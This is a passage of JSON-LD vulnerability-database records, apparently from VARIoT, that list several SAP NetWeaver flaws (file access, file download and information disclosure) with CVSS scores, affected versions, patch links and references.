"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "j2ee core services",
"scope": null,
"trust": 0.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.x*"
},
{
"model": "j2ee core services null",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "*"
}
],
"sources": [
{
"db": "IVD",
"id": "092a042e-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01356"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "092a042e-1f34-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "092a042e-1f34-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "092a042e-1f34-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP J2EE core services provide various features through different protocols. A service lacks proper authentication and authorization, allowing remote unauthenticated attackers to read and write arbitrary files in the SIDADM user context",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01356"
},
{
"db": "IVD",
"id": "092a042e-1f34-11e6-abef-000c29c66e3d"
}
],
"trust": 0.72
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-01356",
"trust": 0.8
},
{
"db": "IVD",
"id": "092A042E-1F34-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "092a042e-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01356"
}
]
},
"id": "VAR-201302-0414",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "092a042e-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01356"
}
],
"trust": 1.4345896100000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "092a042e-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01356"
}
]
},
"last_update_date": "2022-05-17T01:48:05.536000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP J2EE Core Service Patch for Any File Access Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/32379"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01356"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-02/0133.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01356"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "092a042e-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01356"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-28T00:00:00",
"db": "IVD",
"id": "092a042e-1f34-11e6-abef-000c29c66e3d"
},
{
"date": "2013-02-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01356"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01356"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP J2EE Core Service Arbitrary File Access Vulnerability",
"sources": [
{
"db": "IVD",
"id": "092a042e-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01356"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Permission permission and access control errors",
"sources": [
{
"db": "IVD",
"id": "092a042e-1f34-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201508-0681
Vulnerability from variot
SAP NetWeaver is prone to an arbitrary file-download vulnerability. An attacker can exploit this issue to download arbitrary files. Information obtained may aid in further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201508-0681",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "76418"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Onapsis",
"sources": [
{
"db": "BID",
"id": "76418"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an arbitrary file-download vulnerability.\nAn attacker can exploit this issue to download arbitrary files. Information obtained may aid in further attacks.",
"sources": [
{
"db": "BID",
"id": "76418"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "76418",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "76418"
}
]
},
"id": "VAR-201508-0681",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:00:00.268000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 0.3,
"url": "http://scn.sap.com/community/security/blog/2015/08/11/sap-security-patch-day-summary--august-2015"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2169391"
},
{
"trust": 0.3,
"url": "https://www.onapsis.com/blog/analyzing-sap-security-notes-august-2015-edition"
}
],
"sources": [
{
"db": "BID",
"id": "76418"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "76418"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-13T00:00:00",
"db": "BID",
"id": "76418"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-13T00:00:00",
"db": "BID",
"id": "76418"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "76418"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver \u0027AFPServlet\u0027 Arbitrary File Download Vulnerability",
"sources": [
{
"db": "BID",
"id": "76418"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "76418"
}
],
"trust": 0.3
}
}
var-201604-0101
Vulnerability from variot
The chat feature in the Real-Time Collaboration (RTC) services 7.3 and 7.4 in SAP NetWeaver Java AS 7.1 through 7.5 allows remote attackers to obtain sensitive user information by visiting webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#, pressing "Add users", and doing a search, aka SAP Security Note 2255990. SAP NetWeaver is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. SAP Netweaver 7.4 is vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201604-0101",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver application server java",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.1 to 7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.40"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002000"
},
{
"db": "NVD",
"id": "CVE-2016-3973"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-094"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.50",
"versionStartIncluding": "7.10",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3973"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vahagn Vardanyan (ERPScan).",
"sources": [
{
"db": "BID",
"id": "85943"
}
],
"trust": 0.3
},
"cve": "CVE-2016-3973",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-3973",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-3973",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-3973",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2016-3973",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201604-094",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002000"
},
{
"db": "NVD",
"id": "CVE-2016-3973"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-094"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The chat feature in the Real-Time Collaboration (RTC) services 7.3 and 7.4 in SAP NetWeaver Java AS 7.1 through 7.5 allows remote attackers to obtain sensitive user information by visiting webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#, pressing \"Add users\", and doing a search, aka SAP Security Note 2255990. SAP NetWeaver is prone to an information-disclosure vulnerability. \nAttackers can exploit this issue to obtain sensitive information that may lead to further attacks. \nSAP Netweaver 7.4 is vulnerable; other versions may also be affected",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3973"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002000"
},
{
"db": "BID",
"id": "85943"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-3973",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "137579",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002000",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201604-094",
"trust": 0.6
},
{
"db": "BID",
"id": "85943",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "85943"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002000"
},
{
"db": "NVD",
"id": "CVE-2016-3973"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-094"
}
]
},
"id": "VAR-201604-0101",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:37:49.858000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2255990",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "SAP NetWeaver AS Java Real-Time Collaboration Repair measures for service security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60825"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002000"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-094"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002000"
},
{
"db": "NVD",
"id": "CVE-2016-3973"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/137579/sap-netweaver-as-java-7.5-information-disclosure.html"
},
{
"trust": 1.6,
"url": "http://seclists.org/fulldisclosure/2016/jun/46"
},
{
"trust": 1.6,
"url": "https://erpscan.io/advisories/erpscan-16-016-sap-netweaver-7-4-information-disclosure-wd_chat/"
},
{
"trust": 1.6,
"url": "https://erpscan.io/press-center/blog/sap-security-notes-march-2016-review/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3973"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3973"
},
{
"trust": 0.8,
"url": "https://erpscan.com/advisories/erpscan-16-016-sap-netweaver-7-4-information-disclosure-wd_chat/"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "BID",
"id": "85943"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002000"
},
{
"db": "NVD",
"id": "CVE-2016-3973"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-094"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "85943"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002000"
},
{
"db": "NVD",
"id": "CVE-2016-3973"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-094"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-03-09T00:00:00",
"db": "BID",
"id": "85943"
},
{
"date": "2016-04-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002000"
},
{
"date": "2016-04-07T19:59:04.377000",
"db": "NVD",
"id": "CVE-2016-3973"
},
{
"date": "2016-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-094"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-03-09T00:00:00",
"db": "BID",
"id": "85943"
},
{
"date": "2016-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002000"
},
{
"date": "2021-04-20T19:49:13.713000",
"db": "NVD",
"id": "CVE-2016-3973"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-094"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-094"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Java AS Vulnerability in the acquisition of important user information in the chat function of the real-time collaboration service",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002000"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-094"
}
],
"trust": 0.6
}
}
var-201303-0440
Vulnerability from variot
SAP NetWeaver is the technical foundation of SAP's integrated technology platform and all SAP applications since SAP Business Suite. When SAP NetWeaver processes SMB, there is an error in the BAPI function, which can cause any file on the SAP server file system to be leaked through the SMB relay attack. SAP NetWeaver is prone to an arbitrary file-disclosure vulnerability because it fails to properly sanitize user-supplied input before being used to read files. Remote attackers can exploit this issue to disclose arbitrary files in the context of the application. This may aid in further attacks. SAP NetWeaver 7.30 is vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201303-0440",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.3"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
}
],
"sources": [
{
"db": "IVD",
"id": "62a24538-1f30-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01891"
},
{
"db": "BID",
"id": "58487"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nikolay Mescherin (ERPScan)",
"sources": [
{
"db": "BID",
"id": "58487"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
